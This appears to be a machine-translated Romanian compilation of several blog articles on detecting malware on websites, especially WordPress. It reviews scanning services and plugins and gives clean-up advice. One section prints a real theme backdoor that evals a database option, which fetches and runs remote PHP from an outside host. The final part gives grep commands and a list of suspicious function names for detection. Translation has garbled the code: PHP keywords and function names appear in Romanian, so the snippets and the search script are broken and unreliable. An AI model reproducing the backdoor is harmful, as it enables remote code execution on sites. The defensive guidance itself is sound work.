Uneori există o situație în care trebuie să verificați un site pentru viruși. Acest lucru poate fi necesar, de exemplu, dacă dvs pentru o lungă perioadă de timp caută pe internet răspunsul la întrebarea ta și în cele din urmă l-ai găsit, dar dintr-o dată într-un motor de căutare dai peste un avertisment că site-ul îți poate amenința siguranța. Cei care petrec mult timp pe Internet înțeleg despre ce vorbesc. Pentru voi ceilalți, voi încerca să explic mai detaliat ce ar putea însemna asta.

Și astfel, toate motoarele de căutare scanează și verifică în mod regulat toate site-urile pentru viruși și cod rău intenționat. Când robot de căutare găsește un astfel de cod pe un site, emite automat un avertisment în căutare că acest site vă poate amenința computerul. Dar acest lucru nu este întotdeauna adevărat, deoarece acești roboți pot face greșeli și chiar și așa se întâmplă cod normal, De exemplu, butoane sociale sau JavaScript pentru rău intenționat. Într-o astfel de situație, apare o întrebare firească. Merită măcar să vizitați acest site?

Dacă este posibil să găsiți informațiile care vă interesează pe un alt site, atunci un astfel de site, unde există un avertisment că poate distribui cod rău intenționat sau un virus, nu merită, desigur, vizitat. Dar când ai căutat de multă vreme informații de care chiar ai nevoie și, în sfârșit, le-ai găsit, ce ar trebui să faci în acest caz?
Acest lucru este pe de o parte, dar pe de altă parte, dacă sunteți proprietarul unui site web și într-o zi însorită, în contul dvs. Yandex sau Google, găsiți un avertisment că există cod rău intenționat pe site-ul dvs.? Cred că un astfel de avertisment nu vă va îmbunătăți starea de spirit. Și ce să faceți în acest caz, Cum să găsiți acest cod rău intenționat sau virus? Este puțin probabil ca programele antivirus convenționale să vă ajute aici. Pentru acest caz există programe specialeși servicii online care pot scana un site și pot verifica site-urile pentru coduri rău intenționate. Astfel de programe și servicii on-line Desigur, probabil că există o mulțime de ele pe Internet. Și nu am de gând să vorbesc despre toate aici și, desigur, nu le știu pe toate. Aici voi vorbi despre câteva servicii despre care știu și pe care le-am folosit.
Dacă sunteți webmaster, puteți face acest lucru prin contul dvs. din Yandex, Google etc. deși acest lucru nu ajută întotdeauna. De exemplu, așa cum mi s-a întâmplat mie. Într-o zi, un prieten de-al meu îmi spune că atunci când îmi vizitează site-ul, el utilitar antivirusîi spune că există un virus pe site-ul meu. Desigur, verific imediat toate conturile motoare de căutare, unde este înregistrat site-ul meu. Și peste tot există mesaje că nu există viruși sau coduri suspectate rău intenționate pe site-ul meu. Se dovedește că, conform motoarelor de căutare, site-ul meu este curat și nu există malware sau viruși. Dar programul antivirus al prietenului meu a găsit ceva pe undeva. Și un astfel de program este probabil instalat nu numai de el, ci poate fi instalat și de mulți alți utilizatori de internet. Și se pare că toți cei care au instalat un astfel de program vor ocoli site-ul meu și nu este un fapt că se vor întoarce ulterior pe acest site după un astfel de avertisment.
Atunci am început să caut diverse programeși servicii online pentru verificarea unui site pentru coduri rău intenționate. După cum am scris deja mai sus, există multe astfel de servicii pe Internet, dar, practic, după scanare, pur și simplu arată informații despre prezența codului rău intenționat pe site. Adică, indiferent dacă există sau nu suspiciuni, asta-i tot. De exemplu, ca acest serviciu.

Există o suspiciune de virus și scrie că s-au găsit inserții iframe pe site. Dar dacă te uiți la codul paginii, poți înțelege că acesta este doar un cod de încorporare pentru un videoclip de pe YouTube.

Al doilea serviciu online pentru verificarea unui site web pentru malware

Alarmă antivirus - pentru a scana site-ul pe care îl specificați, serviciul folosește baze de date antivirus de la cele mai mari companii de antivirus din lume. Scanare completă durează până la 10 minute și nu se oprește chiar dacă închideți pagina. Există, de asemenea, un link aici unde puteți vizualiza rezultatele în orice moment. Un alt lucru bun despre acest serviciu este că conține o listă a celor mai frecvent detectați viruși pe site-uri web. De exemplu, așa arată codul virusului asqyt.in iframe:

Există, de asemenea, o listă de NU viruși. Acest lucru vă împiedică să vă grăbiți să intrați în panică atunci când unul dintre programe antivirus greșește codul cu un virus.
De exemplu, aici, conform Google, nici măcar nu are încredere în el.

Prin urmare, tragem o concluzie. Și părerea mea este că toate aceste servicii sunt, desigur, incontestabil utile și aduc cu adevărat un mare ajutor în găsirea codului rău intenționat pe un site web. Dar, după cum se spune, ai încredere, dar verifică, așa că trebuie să verifici singur toate informațiile furnizate de aceste servicii. Și, bineînțeles, acțiunea finală rămâne doar la latitudinea ta.

WordPress este unul dintre cele mai multe sisteme populare management de conținut, utilizat pentru o varietate de scopuri: de la blogging la comerțul electronic. Există larg alege pluginuri și teme pentru WordPress. Se întâmplă ca unele dintre aceste extensii să cadă în mâinile webmasterilor după ce un atacator a lucrat la ele.

În beneficiul său, el ar putea lăsa în ele linkuri publicitare sau coduri cu care va gestiona site-ul dumneavoastră. Mulți utilizatorii WordPress nu au prea multa experienta in programare web si nu stiu cum sa actioneze intr-o astfel de situatie.

Pentru ei am revizuit nouă dintre cele mai multe instrumente eficiente pentru a detecta modificări rău intenționate în codul unui site web care rulează sau al suplimentelor instalate.

Theme Authenticity Checker (TAC) – plugin WordPress care scanează fiecare tema stabilită pentru elemente suspecte, cum ar fi link-uri invizibile sau cod criptat Base64.

După ce a detectat astfel de elemente, TAC le raportează administratorului WordPress, permițându-i să le analizeze în mod independent și, dacă este necesar, să le corecteze fișiere sursă subiecte:

Exploit Scanner scanează toate sursă site-ul dvs. și conținutul bazei de date Date WordPress pentru prezența incluziunilor dubioase. La fel ca TAC, acest plugin nu previne atacurile și nu combate consecințele acestora în mod automat.

Afișează doar administratorului site-ului simptomele detectate de infecție. Dacă doriți să eliminați codul rău intenționat, va trebui să faceți acest lucru manual:

Sucuri este o soluție cunoscută în domeniu Securitate WordPress. Pluginul Sucuri Security monitorizează fișierele încărcate pe un site WordPress și le păstrează propria listă amenințări cunoscute și, de asemenea, vă permite să scanați de la distanță un site folosind scaner gratuit Scaner Sucuri SiteCheck. In spate taxa de abonare Puteți consolida și mai mult securitatea site-ului dvs. instalând un sistem puternic firewall Sucuri Website Firewall:

Anti-Malware este un plugin pentru WordPress care poate găsi și elimina scripturi troiene, backdoors și alt cod rău intenționat.

Setările de scanare și ștergere pot fi personalizate. Acest plugin poate fi folosit după înregistrare gratuită pe gotmls.

Pluginul accesează în mod regulat site-ul web al producătorului, transmite statistici de detectare a programelor malware și primește actualizări. Prin urmare, dacă nu doriți să instalați pluginuri pe site-ul dvs. care monitorizează funcționarea acestuia, atunci ar trebui să evitați utilizarea Anti-Malware:

WP Antivirus Site Protection este un plugin care scanează toate fișierele încărcate pe un site, inclusiv temele WordPress.

Pluginul are propria bază de date de semnături, care este actualizată automat prin Internet. Poate elimina automat amenințările, notifică administratorul site-ului prin e-mailȘi mult mai mult.

Pluginul este instalat și funcționează gratuit, dar are mai multe suplimente plătite cărora merită să acordați atenție:

AntiVirus pentru WordPress este un plugin ușor de utilizat care vă poate scana site-ul în mod regulat și vă poate notifica prin e-mail problemele de securitate. Pluginul are un " personalizabil Lista albă"și alte funcții:

Scanerul Quterra verifică un site web pentru vulnerabilități, injecții de cod de la terți, viruși, uși din spate etc. Scanerul are așa ceva oportunități interesante, cum ar fi scanarea euristică, detectarea legăturilor externe.

Funcțiile de bază ale scanerului sunt gratuite, în timp ce unele serviciu suplimentar vă va costa 60 USD pe an:

Dacă sunteți în căutarea unei soluții cuprinzătoare la problemele de securitate ale site-ului dvs., nu căutați mai departe decât Wordfence.

Acest plugin oferă protecție continuă pentru WordPress împotriva unor tipuri cunoscute de atacuri, autentificare cu doi factori, suport pentru o „listă neagră” de adrese IP ale computerelor și rețelelor utilizate de hackeri și spammeri, scanând site-ul pentru ușile din spate cunoscute.

Acest plugin este gratuit versiunea de bază, dar are și funcționalitate premium, pentru care producătorul solicită o taxă de abonament modestă:

Wemahu monitorizează modificările codului site-ului dvs. și caută cod rău intenționat.

Baza de date pe care este detectat malware este completată folosind metoda crowdsourcing: utilizatorii înșiși o reînnoiesc trimițând rezultatele scanării instalațiilor WordPress infectate pe site-ul web al autorului pluginului. Pluginul acceptă, de asemenea, trimiterea de rapoarte prin e-mail și alte funcții utile:

Traducerea articolului „9 pluginuri WordPress pentru a detecta codul rău intenționat pe site-ul tău” a fost pregătită de echipa prietenoasă a proiectului.

Fiecare webmaster care descoperă cod rău intenționat pe site-ul său primește o mulțime de experiențe nu tocmai plăcute. Proprietarul site-ului imediat, în panică, încearcă să găsească și să distrugă virusul și să înțeleagă cum acest lucru urât ar putea ajunge pe site-ul său. Dar, după cum arată practica, găsirea unui cod rău intenționat pe un site web nu este atât de ușoară. La urma urmei, un virus poate fi înregistrat într-unul sau mai multe fișiere, de la sumă uriașă din care este format site-ul, fie el un motor care rulează pe WordPress sau un site obișnuit pe html.

Ieri, în timp ce îmi verificam e-mailul, am găsit un e-mail de la Google care spunea că vizita anumite pagini site-ul meu poate duce la infectarea computerelor utilizatorilor malware. Acum, utilizatorilor care accesează aceste pagini prin link-uri în rezultatele căutării Google.ru li se afișează o pagină de avertizare. Acest site nu a fost adăugat la panoul meu webmasteri Google, așa că am fost anunțat prin poștă. Mai aveam câteva site-uri în panoul pentru webmasteri, când am fost acolo, am fost îngrozit să văd un avertisment despre cod rău intenționat pe încă două dintre site-urile mele.
Drept urmare, pe trei dintre site-urile mele s-a instalat un cod rău intenționat, pe care a trebuit să le găsesc și să le distrug. Unul dintre site-uri rula pe WordPress, celelalte două constau în pagini PHP obișnuite.

Este de remarcat faptul că Google a reacționat mult mai rapid decât Yandex pentru prezența unui cod rău intenționat. În panoul pentru webmasteri Yandex, nu a apărut un avertisment despre prezența unui virus pe site. Din fericire, în câteva ore am reușit să găsesc acest virus nefericit.

De regulă, cel mai adesea site-urile sunt infectate de așa-numitul virus iframe. În esență, acest virus constă din cod... . Virusul fură toate parolele de la Comandant total sau alt client ftp. În cazul meu, același lucru sa întâmplat și codul iframe a fost scris în câteva zeci de fișiere de pe site-ul meu. Pe site, care rula pe WordPress, codul rău intenționat a reușit să se instaleze doar în footer.php.

Și așa, cum să găsiți cod rău intenționat dacă descoperiți că site-ul dvs. este infectat:

1. Accesați panoul de control al găzduirii și schimbați-vă parola. Dacă aveți mai multe site-uri, atunci facem acest lucru cu toate site-urile noastre.

2. Schimbați și ștergeți parolele din clientul ftp. Nu mai stocăm parolele în clienții ftp, le introducem întotdeauna manual.

3. Puteți merge la găzduire prin ftp și puteți vedea ce s-a schimbat în fișierele dvs. Sortați fișierele după dată ultima schimbare. Acele fișiere care sunt infectate trebuie să aibă cea mai recentă și aceeași dată. Deschideți aceste fișiere și căutați codul iframe, de obicei acest cod se află la sfârșit. Practic, codul rău intenționat este scris în următoarele fișiere: index.php, index.html și fișiere cu extensia .js. Adesea, această infecție trăiește între etichete... .
Pentru site-urile auto-scrise, uitați-vă cu mare atenție la toate fișierele și folderele de scripturi, virusul este adesea scris acolo. De asemenea, habitatul preferat al acestui virus este in codurile de contra pentru site, si in codurile de publicitate.

4. Verificați fișierul .htaccess pentru cod suspect. Uneori, cod rău intenționat pătrunde în acest fișier. De obicei, există mai multe directoare în fișierele motor în care poate fi localizat fișierul .htaccess. Verificați toate aceste fișiere și asigurați-vă că codul este „curat”.

În ceea ce privește fișierele WordPress sau alt CMS, de regulă, orice CMS este format din multe fișiere și foldere și este foarte dificil să găsești cod rău intenționat în ele. De exemplu, pentru WordPress pot recomanda pluginul TAC. Acest plugin verifică fișierele din toate temele din folderul teme pentru codul terță parte. Dacă TAC găsește cod nedorit, va afișa calea către acest fișier. Astfel, este posibil să se calculeze virusul de mascare.
Descărcați pluginul TAC: wordpress.org

În general, ar trebui să aveți în vedere în mod constant toate acțiunile pe care le-ați efectuat cu fișierele site-ului dvs. Amintiți-vă ce a fost modificat sau adăugat la acest sau acel cod.

Odată ce găsiți și eliminați codul rău intenționat, nu strica să verificați computerul pentru viruși.
Și dacă site-ul dvs. a fost marcat de Google sau Yandx ca fiind infectat, atunci trebuie să trimiteți o solicitare de reverificare prin panoul pentru webmasteri. De regulă, motoarele de căutare ar trebui să elimine toate restricțiile de pe site-ul dvs. în termen de 24 de ore. Nu a durat mult până când Google a procesat cererea mea de reverificare și, după câteva ore, toate restricțiile au fost eliminate de pe site-urile mele.

Bună prieteni. Ești sigur că este gratuit? Șablon WordPress, pe care îl utilizați pentru site-urile și blogurile dvs. este cu adevărat sigur și nu conține amenințări ascunse și cod rău intenționat? Ești complet sigur de asta? Absolut?)

Crezi că ai rulat șablonul prin , ai eliminat link-urile ascunse din acesta și treaba este gata. Scanați periodic fișierele site-ului cu un antivirus, căutați instrumentele pentru webmasteri Yandex din fila Securitate și sunteți ușurat să vedeți mesajul acolo: „ Nu a fost detectat niciun cod rău intenționat pe site«.

Asa am crezut si eu. Nu aș vrea să te supăr, dar...

Aceasta este scrisoarea pe care am primit-o săptămâna trecută prin e-mail de la compania mea de găzduire. Recent s-au prezentat verificare regulată toate fișierele site-ului să caute conținut rău intenționat și au găsit acest conținut în mine!

Totul a început când am intrat pe site-ul meu într-o după-amiază și nu l-am putut lansa - a apărut un mesaj abuziv despre fișierele care nu au fost găsite cu extensia php. După ce m-am tensionat puțin, m-am dus să studiez conținutul folderului cu site-ul de pe găzduire și am descoperit imediat o problemă - fișierul meu șablon fuctions.php a fost redenumit în functions.php.malware, ceea ce părea să sugereze în mod ambiguu - un antivirus era lucrând aici sau ceva de genul asta) După ce am mers la poștă, am găsit raportul de mai sus de la gazdă.

Primul lucru pe care l-am făcut, desigur, a fost să verific acest fișier, i-a studiat conținutul, l-a scanat cu tot felul de antivirusuri, zeci de servicii online de verificare a virușilor etc. — până la urmă nu s-a găsit nimic, toți au afirmat în unanimitate că dosarul este complet în siguranță. Bineînțeles, mi-am exprimat îndoielile hosterului, spunând că ați greșit ceva, dar pentru orice eventualitate, le-am rugat să furnizeze un raport privind detectarea unei bucăți de cod rău intenționate.

Și asta mi-au răspuns

Am intrat pe google informații despre acest cod și m-am gândit serios...

După cum se dovedește, aceasta este o tehnică cu adevărat non-trivială, care permite părților interesate să transmită date pe site-ul dvs. și să modifice conținutul paginilor fără știrea dvs.! Dacă utilizați un șablon gratuit, vă recomand să verificați funcțiile.php pentru următorul cod:

add_filter('the_content', '_bloginfo', 10001);
funcția _bloginfo($conținut)(
global $post;
if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false)(
returneaza $co;
) altfel returnează $conținut;
}

Chiar și cu cunoștințele mele foarte superficiale despre PHP, este clar că se creează un anumit filtru, legat de postarea variabilă globală și de conținut, care sunt responsabile pentru afișarea conținutului numai pe paginile postărilor de blog (condiția is_single). Deja suspect, nu? Ei bine, acum să vedem ce va afișa acest cod pe site-ul nostru.

Opțiunea interesantă blogoption cerută în baza de date pare și ea foarte suspectă. Să mergem la baza noastră de date Date MySQLși găsiți acolo un tabel numit wp_options, dacă nu ați schimbat prefixele, atunci va arăta astfel implicit. Și în ea găsim linia care ne interesează numită blogoption

Ce frumusete! Vedem următoarea opțiune

return eval(file_get_contents(‘http://wpru.ru/aksimet.php?id=’.$post->ID.’&m=47&n’));

Acestea. De pe un anumit site (și unul rusesc, ține cont) ei returnează conținut care poate conține orice! Orice număr de link-uri, coduri rău intenționate, text modificat etc. Când accesați site-ul în sine, vă dă o eroare de acces 403, ceea ce nu este surprinzător. Desigur, am eliminat și această opțiune din baza de date.

Conform informațiilor de la victime, conținutul exact al articolului dvs. este de obicei returnat cu o singură modificare - în loc de orice punct „”. deghizat în text deschide link-ul! Și apropo, această opțiune este scris în baza de date atunci când șablonul în sine este instalat, iar apoi codul care face acest lucru se autodistruge cu succes. Și am trăit cu astfel de gunoaie timp de doi ani și nici un singur antivirus sau serviciu nu mi-a detectat-o această amenințare pentru tot acest timp. Sincer să fiu, nu am observat dacă acest truc a funcționat vreodată pentru mine sau dacă pluginul meu de securitate a blocat această caracteristică (sau poate că una dintre actualizările WordPress a închis această gaură), dar este încă neplăcut.

Cum vă place rafinamentul „traducătorilor” noștri de șabloane (sau celor care le postează în cataloagele lor)? Acest lucru nu este pentru tine să decupezi link-urile din subsol) Păcat că nu-mi amintesc de unde mi-am descărcat șablonul, a fost cu mult timp în urmă, altfel aș fi scris cu siguranță câteva dintre ele afectuoase. Și dacă la acea vreme aș avea aceeași experiență pe care o am acum, cu siguranță nu aș fi folosit șablon gratuit, sau ca ultimă soluție, nu aș descărca din surse necunoscute!

Este mai ușor să cumperi un șablon premium oficial pentru 15-20 de dolari și să trăiești în pace, știind că nu există găuri sau legături criptate în el și, chiar dacă există vulnerabilități, dezvoltatorii vor lansa cu siguranță o actualizare în care aceste găuri vor fi. închis. (Apropo, Artem a publicat recent un articol în care vorbește despre șabloane premium și chiar oferă coduri promoționale pentru reduceri brutale pentru cei interesați)

WordPress este cel mai popular motor pentru crearea diferitelor site-uri web și bloguri de informații. Securitatea site-ului dvs. este mai mult decât securitatea datelor dvs. Acest lucru este mult mai important, deoarece este și siguranța tuturor utilizatorilor care citesc și au încredere în resursa dvs. De aceea este atât de important ca site-ul să nu fie infectat cu viruși sau orice alt cod rău intenționat.

Ne vom uita la modul de a proteja WordPress de hacking într-unul dintre următoarele articole, dar acum vreau să vă spun cum să verificați un site web WordPress pentru viruși și coduri rău intenționate pentru a vă asigura că totul este în siguranță.

Prima opțiune care vă vine în minte este că ați fost piratat de hackeri și ați construit ușile din spate în codul site-ului dvs. pentru a putea trimite spam, pune link-uri și alte lucruri rele. Acest lucru se întâmplă uneori, dar acesta este un caz destul de rar dacă actualizați software-ul la timp.

Există mii de teme WordPress gratuite și diverse plugin-uri, iar acest lucru ar putea fi deja o amenințare. Una este când descărcați un șablon de pe site-ul WordPress și alta este când îl găsiți pe site-ul din stânga. Dezvoltatorii fără scrupule pot încorpora diferite coduri rău intenționate în produsele lor. Riscul este și mai mare dacă descărcați gratuit șabloane premium, unde hackerii, fără a risca nimic, pot adăuga un fel de gaură de securitate prin care apoi să pătrundă și să facă ceea ce au nevoie. Acesta este motivul pentru care verificarea unui site WordPress pentru viruși este atât de importantă.

Primul lucru pe care trebuie să-l căutați atunci când verificați un site pentru viruși este Pluginuri WordPress. Rapid și ușor, puteți să vă scanați site-ul și să găsiți zone suspecte de cod cărora merită să le acordați atenție, indiferent dacă acestea sunt în tema, plugin-ul sau nucleul Wodpress. Să ne uităm la câteva dintre cele mai populare plugin-uri:

Acest plugin foarte simplu verifică toate temele instalate pe site-ul tău pentru a vedea dacă conțin cod rău intenționat. Pluginul detectează legăturile ascunse criptate folosind inserarea codului base64 și, de asemenea, afișează informații detaliate despre problemele găsite. Cel mai adesea, bucățile de cod găsite nu sunt viruși, dar pot fi potențial periculoase, așa că ar trebui să le acordați atenție.

Deschis " Aspect" -> "TAC" apoi așteptați până când toate firele sunt verificate.

Foarte similar cu scanerul TOC pentru subiecte, dar produce mai multe informatii detaliate. Aceleași capacități de detectare a legăturilor cod ascunsși alte inserții rău intenționate. Doar deschideți elementul VIP Scanner din secțiunea de instrumente și analizați rezultatul.

Poate fi suficient pentru a elimina fișiere suplimentare, de exemplu desktop.ini. Sau trebuie să vă uitați mai detaliat la ceea ce se întâmplă în fișierele care utilizează base64.

Acest plugin vă permite nu numai să scanați temele și nucleul site-ului pentru viruși, ci și să protejați site-ul de parolele de forță brută și diferite atacuri XSS, SQLInj. Căutarea se efectuează pe baza semnăturilor și vulnerabilităților cunoscute. Unele vulnerabilități pot fi remediate pe site. Pentru a începe scanarea fișierelor, deschideți „Anti-Malvare” în meniul lateral și faceți clic pe „Run Scan”:

Înainte de a putea executa o scanare, trebuie să vă actualizați bazele de date de semnături.

Acesta este unul dintre cele mai populare plugin-uri pentru Protecție WordPressși scanarea pentru cod rău intenționat. În afară de scaner, care poate găsi majoritatea marcajelor în Cod WordPress, există protectie permanenta din tipuri variate atacuri și parola brute force. În timpul căutării, pluginul găsește posibile probleme cu diverse plugin-uri și teme, raportează necesitatea de a actualiza WordPress.

Deschideți fila „WPDefence” în meniul lateral, apoi accesați fila „Scanare” și faceți clic pe „Start Scan”:

Scanarea poate dura anumit timp, dar la finalizare veți vedea un raport detaliat al problemelor găsite.

Acesta este un alt plugin simplu care va scana șablonul site-ului dvs. pentru cod rău intenționat. Dezavantajul este că doar șablonul curent este scanat, dar informațiile sunt afișate suficient de detaliat. Veți vedea toate funcțiile periculoase care sunt în temă și apoi puteți analiza în detaliu dacă prezintă vreun pericol. Găsiți elementul „AntiVirus” în setări, apoi faceți clic pe „Scanați șabloanele de teme acum”:

De asemenea, este recomandabil să verificați integritatea Fișiere WordPress, în cazul în care virusul s-a înregistrat deja undeva. Pentru a face acest lucru, puteți utiliza pluginul Integrity Checker. Verifică toate fișierele de bază, plugin și șablon pentru modificări. La sfârșitul scanării, veți vedea informații despre fișierele modificate.

Există, de asemenea, mai multe servicii online care vă permit să verificați un site WordPress pentru viruși sau să verificați doar șablonul. Aici sunt câțiva dintre ei:

themecheck.org - descărcați arhiva temei și puteți vedea toate avertismentele despre posibilele funcții rău intenționate care sunt utilizate în ea. Puteți nu numai să vizualizați informații despre tema dvs., ci și despre alte teme încărcate de alți utilizatori, precum și versiuni diferite Subiecte. Orice plugin-uri găsesc poate fi găsit pe acest site. Examinare teme wordpress este de asemenea foarte important.

virustotal.com este o resursă binecunoscută unde vă puteți verifica site-ul web sau fișierul șablon pentru viruși.

ReScan.pro - scanarea unui site WordPress pentru viruși folosind acest serviciu este gratuită, se efectuează analize statice și dinamice pentru a detecta posibile redirecționări, scanerul deschide paginile site-ului. Verifică site-ul cu diverse liste negre.

sitecheck.sucuri.net este un serviciu simplu de scanare a site-urilor și a subiectelor pentru viruși. Există un plugin pentru WordPress. Detectează link-uri și scripturi periculoase.

Nimic nu poate fi mai bun decât verificare manuală. Linux are acest minunat utilitar grep care vă permite să căutați apariții de șiruri arbitrare într-un folder cu fișiere. Rămâne să înțelegem ce vom căuta:

eval - această funcție vă permite să executați arbitrar cod php, nu este folosit de produsele care se respectă dacă unul dintre pluginuri sau o temă folosește această funcție, cu probabilitate aproape sută la sută putem spune că există un virus acolo;

• base64_decode - funcțiile de criptare pot fi folosite împreună cu eval pentru a ascunde codul rău intenționat, dar pot fi folosite și în scopuri pașnice, așa că aveți grijă;
• sha1 este o altă metodă de criptare a codului rău intenționat;
• gzinflate - funcție de compresie, aceleași obiective, împreună cu eval, de exemplu, gzinflate(base64_decode(code);
• strrev - inversează șirul nu înainte, deoarece o opțiune poate fi folosită pentru criptarea primitivă;
• print - scoate informatii in browser, impreuna cu gzinflate sau base64_decode este periculos;
• file_put_contents - WordPress în sine sau pluginurile pot crea în continuare fișiere în sistemul de fișiere, dar dacă tema face acest lucru, atunci ar trebui să fiți atenți și să verificați de ce face acest lucru, deoarece pot fi instalați viruși;
• file_get_contents - folosit în cele mai multe cazuri în scopuri pașnice, dar poate fi folosit pentru a descărca cod rău intenționat sau pentru a citi informații din fișiere;
• curl - aceeași poveste;
• fopen - deschide un fișier pentru scriere, nu se știe niciodată în ce scop;
• sistem - funcția execută comanda în sistem Linux, dacă o temă, plugin sau wordpress în sine face acest lucru, cel mai probabil există un virus;
• link simbolic - creează legături simbolice în sistem, poate că virusul încearcă să facă cea principală Sistemul de fișiere accesibil din exterior;
• copiere - copiază un fișier dintr-o locație în alta;
• getcwd - returnează numele directorului de lucru curent;
• cwd - modifică folderul de lucru curent;
• ini_get - obține informații despre setări PHP, mai des în scopuri pașnice, dar nu se știe niciodată;
• error_reporting(0) - dezactivează afișarea oricăror mesaje de eroare;
• window.top.location.href - funcția javascript, folosit pentru redirecționări către alte pagini;
• piratat - așa că, pentru orice eventualitate, verificăm, brusc, hackerul însuși a decis să ne spună.

Puteți înlocui fiecare cuvânt separat la această comandă:

grep -R "piratat" /var/www/path/to/files/wordpress/wp-content/

Sau folosiți un script simplu care va căuta toate cuvintele simultan:

values="base64_decode(
eval(base64_decode
gzinflate(base64_decode(
getcwd();
strrev(
chr(ord(
cwd
ini_get
window.top.location.href
copie(
eval(
sistem(
link simbolic(
error_reporting(0)
imprimare
file_get_contents(
file_put_contents(
fopen(
tocat"

cd /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr --include \*.php „$valori” *